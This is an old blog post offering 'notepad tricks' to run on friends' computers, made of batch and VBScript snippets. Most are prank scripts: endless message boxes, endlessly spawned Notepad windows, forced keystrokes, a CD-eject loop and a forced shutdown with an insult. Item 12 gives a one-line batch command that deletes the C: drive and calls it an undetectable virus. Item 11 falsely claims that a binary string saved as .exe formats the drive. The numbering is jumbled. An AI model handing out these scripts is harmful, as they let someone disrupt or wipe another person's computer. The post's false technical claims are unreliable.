Sunday, April 7, 2013

NOTEPAD TRICKS (FOR FUN AND SOME DANGEROUS ALSO)

1. Bush Hid the Facts

Here is one of the most popular notepad tricks. Here are the steps for this cool notepad trick:

Open Notepad.
Type “BUSH HID THE FACTS” (without quotes).
Save that file with any name and close it.
Open It Again to see the magic.

Notepad will automatically hide the text into unknown code ;-) .

2. Test Your Anti-Virus



Using another cool notepad trick, you can also test your antivirus, for its effectiveness. Here are the steps for this trick:

Open Notepad.
Copy the code give below in the notepad file:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it with an .exe extension like testvirus.exe

Now, when you save this file, your antivirus should detect it as a virus immediately. This means your antivirus is working. But if this doesn’t happen, then it means you should get a new antivirus, or update the current one.

3. Notepad Trick to annoy your friends

Open Notepad.
Paste the following code in the notepad file:
@ECHO off
:Begin
msg * Hey
msg * Want to have Fun?
msg * You do?
msg * We will both have fun, alright?
msg * More fun?
GOTO BEGIN
Save the file with any file name but with .bat as extension and close it. For eg. cool.bat

After saving the file just open it (by double clicking) and see what happens.

4. Type “You are a fool” Continuously

Not much to explain, the title says it all! Follow the steps to make this trick work:

Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save the file with any name but with .vbs extension and close it.

Ope the file and see how it makes you type!

5. Open Notepad continuously

Open Notepad.
Paste the following code in your notepad file:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save the file with any name nut with .bat extension and close it.

1)Continually pop out CD Drive Using Notepad:-



Type in Notepad :-

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anyname.VBS".


Like cdvirus.vbs

if you open this file your cddrive continully popout.


2) Convey your friend a lil' message and shut down his / her computer:-
Type in Notepad :-

@echo off
msg * I don't like you
shutdown -c "Error! You are stupid!" -s

Save it as "Anyname.BAT".

Like notepadvirus.bat

6). Matrix Effect:-



Type in Notepad :-

Copy the below mentioned text in your notepad file:

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Save the file with .bat extension like Matrix.bat

Open Notepad.



Copy and paste the below mentioned code :

Dim message, sapi message=InputBox("Enter your text for conversion–Hacking-world.tk","Hover pc Hacks Text-To-Audio Converter") Set sapi=CreateObject("sapi.spvoice") sapi.Speak message

Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs


11).Format Your Hard Disk Using Just Notepad !!

Ever wondered of a way to format your hard disk using just notepad ?

Open notepad.
Type the following the code in it (Or just copy paste it).

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

Save it as an .exe file giving any name you desire.

Thats It ! Now just double click on the file (to open it) and your C: drive will be formatted ! 
This is just a little binary fun. Be Careful while using it.

12)write ur own simple virus cant detected by any antivirus:-


@Echo off 
Del C:\ *.* |y 

And save that as .bat RUN IT
It will delete the content of C:\ drive...

Please Note:: don't run that .bat file on ur system... it will delet c: drive

13) Notepad Trick to type slowly:-

Open Notepad.
Paste the following code in the notepad file:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “

Save the file with any name and with .vbs extension and close it.






2 comments: